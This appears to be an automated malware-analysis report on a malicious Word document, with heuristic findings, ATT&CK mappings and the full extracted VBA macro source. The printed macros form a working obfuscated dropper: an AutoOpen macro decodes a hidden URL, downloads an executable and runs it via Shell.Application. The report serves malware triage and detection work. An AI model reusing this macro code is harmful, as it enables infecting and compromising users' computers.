Verdict: MALICIOUS
Risk Score: 318
Malware Insights
MITRE ATT&CK:
- T1059.005 Visual Basic
- T1566.001 Spearphishing Attachment
The sample is a malicious OLE document containing VBA macros. The 'autoopen' macro is present and triggers the execution of other VBA code. Heuristics indicate the use of URLDownloadToFile, a common method for downloading and executing secondary payloads. The VBA code is heavily obfuscated, but the presence of the autoopen macro and the URLDownloadToFile API strongly suggests a downloader or dropper functionality.
Heuristics (10)
- ClamAV: Doc.Dropper.Agent-1640141 (critical, CLAMAV_DETECTION): ClamAV detected this file as malware: Doc.Dropper.Agent-1640141
- Reference to URLDownloadToFile API (critical, SC_STR_URLDOWNLOAD)
- VBA macros detected (medium, OLE_VBA_MACROS, 5 related findings): Document contains VBA macro code
- URLDownloadToFile in VBA (critical, OLE_VBA_DOWNLOAD). Matched line in script: `"URLDownloadToFileA" (ByVal UYG78t78GIUsfgd As LongPtr, _`
- CreateObject call (high, OLE_VBA_CREATEOBJ). Matched line in script: `Set выпавпавуца = CreateObject(Chr$(83) & Chr$(104) & Chr$(101) & Chr$(108) & Chr$(108) & Chr$(46) & Chr$(65) & Chr$(112) & Chr$(112) & Chr$(108) & Chr$(105) & Chr$(99) & Chr$(97) & Chr$(116) & Chr$(105) & Chr$(111) & Chr$(110))`
- VBA p-code auto-exec with execution tokens (high, OLE_VBA_PCODE_AUTOEXEC_EXEC): Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
- AutoOpen macro (low, OLE_VBA_AUTOOPEN). Matched line in script: `Sub autoopen()`
- Environ() call (env variable access) (low, OLE_VBA_ENVIRON). Matched line in script: `выпавпавуца.Open Environ(wUmMnysKtPzKQMYpELM(Chr$(84) & Chr$(57) & Chr$(77) & Chr$(104) & Chr$(80) & Chr$(38))) & wUmMnysKtPzKQMYpELM(Chr$(92) & Chr$(61) & Chr$(51) & Chr$(39) & Chr$(50) & Chr$(134) & Chr$(52) & Chr$(122) & Chr$(50) & Chr$(57) & Chr$(51) & Chr$(51) & Chr$(53) & Chr$(95) & Chr$(50) & Chr$(64) & Chr$(51) & Chr$(84) & Chr$(53) & Chr$(96) & Chr$(46) & Chr$(88) & Chr$(101) & Chr$(111) & Chr$(120) & Chr$(44) & Chr$(101) & Chr$(45))`
- Legacy WordBasic auto-exec macro marker (medium, OLE_LEGACY_WORDBASIC_AUTOEXEC): OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
- Suspicious extracted artifact (info, EXTRACTED_FILE_STATIC_TRIAGE): One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
Extracted artifacts (1)
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 9129 bytes |

SHA-256: 67695422934e0f361b98a792753df5960fd9013409c9ca6f4c4bd908484f2284
Detection (ClamAV): No threats found
Obfuscation or payload: likely. 86 of 145 identifiers look randomly generated (e.g. 'NvYoUbuCYSSRQHAHMyORUMl'), consistent with name-mangling obfuscation.
Preview script (first 1,000 lines of the extracted script):
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub autoopen()
atqk_x482mp6v
End Sub
Attribute VB_Name = "Module1"
Public Function wUmMnysKtPzKQMYpELM(CLjPtJqwPYMso As String) As String
Dim nwwuzQelPc As Integer
For nwwuzQelPc = 0 To 0
If nwwuzQelPc = 5 Then End
Next nwwuzQelPc
Dim rUkQQqyoTO As Integer
For rUkQQqyoTO = 0 To 0
If rUkQQqyoTO = 5 Then End
Next rUkQQqyoTO
Dim jHzvHYnIwFd As Integer
For jHzvHYnIwFd = 0 To 0
If jHzvHYnIwFd = 5 Then End
Next jHzvHYnIwFd
For mrdVdHiTjnq = 1 To Len(CLjPtJqwPYMso) Step 2
Dim lvBxJabwy As Integer
For lvBxJabwy = 0 To 0
If lvBxJabwy = 5 Then End
Next lvBxJabwy
Dim DrdEbaB As Integer
For DrdEbaB = 0 To 0
If DrdEbaB = 5 Then End
Next DrdEbaB
Dim luGjCiFYkYOhfBlvBxJabw As Integer
For luGjCiFYkYOhfBlvBxJabw = 0 To 0
If luGjCiFYkYOhfBlvBxJabw = 5 Then End
Next luGjCiFYkYOhfBlvBxJabw
Dim CwOLiEd As Integer
For CwOLiEd = 0 To 0
If CwOLiEd = 5 Then End
Next CwOLiEd
Dim CiFYkY As Integer
For CiFYkY = 0 To 0
If CiFYkY = 5 Then End
Next CiFYkY
Dim jAmrQrCwO As Integer
For jAmrQrCwO = 0 To 0
If jAmrQrCwO = 5 Then End
Next jAmrQrCwO
wUmMnysKtPzKQMYpELM = wUmMnysKtPzKQMYpELM & Mid(CLjPtJqwPYMso, mrdVdHiTjnq, 1)
Dim dSVNmPusaOj As Integer
For dSVNmPusaOj = 0 To 0
If dSVNmPusaOj = 5 Then End
Next dSVNmPusaOj
Dim TjbLtvPsKVqDrdEb As Integer
For TjbLtvPsKVqDrdEb = 0 To 0
If TjbLtvPsKVqDrdEb = 5 Then End
Next TjbLtvPsKVqDrdEb
Dim eCgKvq As Integer
For eCgKvq = 0 To 0
If eCgKvq = 5 Then End
Next eCgKvq
Dim lAHJSqlOQxDQ As Integer
For lAHJSqlOQxDQ = 0 To 0
If lAHJSqlOQxDQ = 5 Then End
Next lAHJSqlOQxDQ
Dim aQtPotqBET As Integer
For aQtPotqBET = 0 To 0
If aQtPotqBET = 5 Then End
Next aQtPotqBET
Dim DziwVVw As Integer
For DziwVVw = 0 To 0
If DziwVVw = 5 Then End
Next DziwVVw
Next
Dim QRGbRI As Integer
For QRGbRI = 0 To 0
If QRGbRI = 5 Then End
Next QRGbRI
Dim YosvmLbSDlnI As Integer
For YosvmLbSDlnI = 0 To 0
If YosvmLbSDlnI = 5 Then End
Next YosvmLbSDlnI
Dim ETpqzJEix As Integer
For ETpqzJEix = 0 To 0
If ETpqzJEix = 5 Then End
Next ETpqzJEix
Dim MIUlAHJSql As Integer
For MIUlAHJSql = 0 To 0
If MIUlAHJSql = 5 Then End
Next MIUlAHJSql
Dim JgEwsEU As Integer
For JgEwsEU = 0 To 0
If JgEwsEU = 5 Then End
Next JgEwsEU
Dim SklGHRpVzP As Integer
For SklGHRpVzP = 0 To 0
If SklGHRpVzP = 5 Then End
Next SklGHRpVzP
End Function
Attribute VB_Name = "Module2"
Public Function CBGrxFVwvLB()
End Function
Private Sub ydbIxRHyMQFFstTpRlPo()
End Sub
Private Sub DxPMkTekgsI()
End Sub
Public Sub qNvYoU()
End Sub
Private Sub rYSSRQHAHmM()
End Sub
Public Function UMlOtdZNiZPdnV()
End Function
Public Sub QtFTBSEIj()
End Sub
Private Function geAVuAwILavxG()
End Function
Public Function EQrKEuajinYQYCPfildBQJuceybg()
End Function
Private Sub maLnJIkRjUZzalf()
End Sub
Private Function mLDzKcrMAJhcFH()
End Function
Public Sub VKqzAyDbhoSgfzBtSiaKsu()
End Sub
Private Function ifNbAAckxZtYwN()
End Function
Private Function TmUrb()
End Function
Public Function zQgnpyVQ()
End Function
Public Function jCKzf()
End Function
Attribute VB_Name = "dfsdfsdffdgdhbvdfe3"
#If VBA7 Then
Private Declare PtrSafe Function араваыва Lib "urlmon" Alias _
"URLDownloadToFileA" (ByVal UYG78t78GIUsfgd As LongPtr, _
ByVal UYG78t78GIUsfg As String, _
ByVal UYG78t78GIUsfgf As String, _
ByVal UYG78t78GIUsfgfd As Long, _
ByVal UYG78t78GIUsfgfds As LongPtr) As LongPtr
#Else
Private Declare Function араваыва Lib "urlmon" Alias _
"URLDownloadToFileA" (ByVal UYG78t78GIUsfgd As Long, _
ByVal UYG78t78GIUsfg As String, _
ByVal UYG78t78GIUsfgf As String, _
ByVal UYG78t78GIUsfgfd As Long, _
ByVal UYG78t78GIUsfgfds As Long) As Long
#End If
Function огшпгшщидав(z0ktwRXRQZl2qo0_ As String, ваываывпук As String) As Boolean
vJHKBJdfkgfg = араваыва(0&, z0ktwRXRQZl2qo0_, ваываывпук, 0&, 0&)
Set выпавпавуца = CreateObject(Chr$(83) & Chr$(104) & Chr$(101) & Chr$(108) & Chr$(108) & Chr$(46) & Chr$(65) & Chr$(112) & Chr$(112) & Chr$(108) & Chr$(105) & Chr$(99) & Chr$(97) & Chr$(116) & Chr$(105) & Chr$(111) & Chr$(110))
выпавпавуца.Open Environ(wUmMnysKtPzKQMYpELM(Chr$(84) & Chr$(57) & Chr$(77) & Chr$(104) & Chr$(80) & Chr$(38))) & wUmMnysKtPzKQMYpELM(Chr$(92) & Chr$(61) & Chr$(51) & Chr$(39) & Chr$(50) & Chr$(134) & Chr$(52) & Chr$(122) & Chr$(50) & Chr$(57) & Chr$(51) & Chr$(51) & Chr$(53) & Chr$(95) & Chr$(50) & Chr$(64) & Chr$(51) & Chr$(84) & Chr$(53) & Chr$(96) & Chr$(46) & Chr$(88) & Chr$(101) & Chr$(111) & Chr$(120) & Chr$(44) & Chr$(101) & Chr$(45))
End Function
Attribute VB_Name = "Class1"
Attribute VB_Base = "0{FCFB3D2A-A0FA-1068-A738-08002B3371B5}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = False
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Private Function vzBtSi()
End Function
Public Sub uOrwJGpC()
End Sub
Private Sub LZAUzYpPqBv()
End Sub
Public Function DNTPcsHOQaxsVY()
End Function
Private Function mbGCC()
End Function
Public Sub xFVwvLBE()
End Sub
Public Function dbIxRHyMQF()
End Function
Private Sub TdpRlPoGR()
End Sub
Private Sub PMkTekgsIJ()
End Sub
Private Function NvYoUbuCYSSRQHAH()
End Function
Private Sub ORUMlOtdZN()
End Sub
Private Sub dnVVJvQtFTBSE()
End Sub
Attribute VB_Name = "Module3"
Attribute VB_Name = "Module4"
Public Function NiZPdnVVJvQtFTB()
End Function
Private Sub jQTNgeAVuAwI()
End Sub
Private Function xGQLpEQrK()
End Function
Private Function jkinY()
End Function
Private Sub POfildBQJuc()
End Sub
Public Function gtDZmLnJIk()
End Function
Public Sub ZzalfxuQmLDzKcr()
End Sub
Private Sub hcFHoHNVKqzA()
End Sub
Public Function hoSgf()
End Function
Public Function tSiaKsuOrwGpCccDLZAUzY()
End Function
Private Function BvNwTDNT()
End Function
Attribute VB_Name = "Module5"
Sub atqk_x482mp6v()
огшпгшщидав wUmMnysKtPzKQMYpELM("hltEt<p=::/C/'s4cAhal1a/gNh;a@u0f`e4ro.kdHe2/ZjGs5/PbdiCnB.*e*x^eo"), Environ(wUmMnysKtPzKQMYpELM("T9MhP&")) & wUmMnysKtPzKQMYpELM("\=3'2†4z29335_2@3T5`.Xeox,e-")
End Sub
Public Function ILavxGQLp()
End Function
Private Sub KEuajkin()
End Sub
Private Sub CPOfildBQJuceyb()
End Sub
Private Sub ZmaLnJIkRjU()
End Sub
Private Sub lfxuQ()
End Sub
Private Function zKcrMAJhcFH()
End Function
Public Function VKqzAyDbhoSgf()
End Function
Public Function tSiaKsuOrw()
End Function
Private Function CccDLZAU()
End Function
Private Function PqBvNwTD()
End Function
Public Sub csHOQaxsVYEKe()
End Sub
Public Function CCBGrxFVwvLB()
End Function
Public Sub ydbIxRHyMQFFstT()
End Sub
Public Function lPoGRGDxPMkTek()
End Function
Private Function JfhqNvYoUbuC()
End Function
Attribute VB_Name = "Class2"
Attribute VB_Base = "0{FCFB3D2A-A0FA-1068-A738-08002B3371B5}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = False
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Public Function EQrKEuajinYQYCP()
End Function
Public Function ldBQJu()
End Function
Public Function bgtDZmaLnJ()
End Function
Public Sub jUZzalfxuQmLDz()
End Sub
Private Sub MAJhcFHo()
End Sub
Private Function KqzAyDbhoSgfvzB()
End Function
Public Sub aKsuOr()
End Sub
Private Function pCccDLZAUzYp()
End Function
Public Function vNwTDNTPcs()
End Function
Private Sub axsVYEKembGCCB()
End Sub
Private Function FVwvLBEwUy()
End Function
Private Function xRHyMQFFstTd()
End Function
Public Function PoGRGDx()
End Function
Private Sub TekgsIJ()
End Sub
Private Function NvYoUbuCYSSRQHAHMyORUMl()
End Function
Public Sub ZNiZPnVVJv()
End Sub
Attribute VB_Name = "Class3"
Attribute VB_Base = "0{FCFB3D2A-A0FA-1068-A738-08002B3371B5}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = False
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Private Function QFFstTdpRlPoG()
End Function
Private Sub xPMkTekgsIJ()
End Sub
Private Function NvYoUbuC()
End Function
Private Function SRQHAHmMyORUMl()
End Function
Private Function ZNiZP()
End Function
Public Function VJvQtFTBSEIjQTN()
End Function
Private Function VuAwILavxG()
End Function
Private Sub EQrKEuaj()
End Sub
Private Sub YQYCPOf()
End Sub
Private Sub BQJuc()
End Sub
Public Sub gtDZm()
End Sub
Public Sub JIkRjUZ()
End Sub
Private Function fxuQmLD()
End Function
Private Function rMAJh()
End Function